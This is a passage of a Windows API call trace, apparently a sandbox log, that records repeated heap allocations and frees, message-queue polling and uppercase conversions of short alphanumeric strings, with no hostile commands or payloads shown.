lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0258.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0258.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0258.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0258.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0258.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0258.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0258.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0258.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0258.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0258.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0258.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0258.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0258.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0258.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0258.097] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0258.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0258.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0258.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0258.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0258.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0258.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0258.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0258.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0258.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0258.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0258.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0258.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0258.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0258.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0258.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0258.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0258.098] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0258.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0258.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0258.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0258.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0258.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0258.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0258.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0258.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0258.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0258.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0258.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0258.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0258.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0258.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0258.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0258.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0258.099] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0258.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0258.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0258.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0258.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0258.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0258.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0258.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0258.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0258.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0258.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0258.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0258.100] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.100] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0258.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0258.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0258.100] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0258.100] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0258.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0258.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0258.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0258.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0258.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0258.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0258.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0258.101] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0258.101] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.101] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0258.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0258.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0258.101] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0258.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.101] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0258.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0258.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0258.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0258.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0258.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0258.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0258.102] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0258.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0258.102] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0258.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0258.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0258.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0258.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0258.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0258.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0258.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0258.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0258.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0258.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0258.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0258.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0258.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0258.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0258.103] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0258.103] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.103] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0258.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0258.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0258.103] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0258.103] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0258.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0258.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0258.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0258.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0258.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0258.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0258.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0258.103] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0258.103] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0258.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0258.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0258.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0258.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0258.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0258.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0258.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0258.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0258.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0258.104] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0258.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0258.104] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0258.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0258.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0258.104] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.104] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0258.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0258.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0258.105] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0258.105] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.105] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0258.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0258.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0258.105] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0258.105] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0258.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0258.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0258.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0258.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0258.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0258.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0258.106] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0258.106] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0258.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0258.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0258.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0258.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0258.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0258.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0258.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0258.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0258.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0258.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0258.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0258.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0258.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0258.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0258.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0258.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0258.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0258.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0258.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0258.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0258.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0258.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0258.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0258.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0258.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0258.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0258.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0258.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0258.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0258.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0258.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0258.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0258.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0258.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0258.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0258.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f42f0 | out: hHeap=0x25c0000) returned 1 [0258.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0258.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0258.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0258.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | 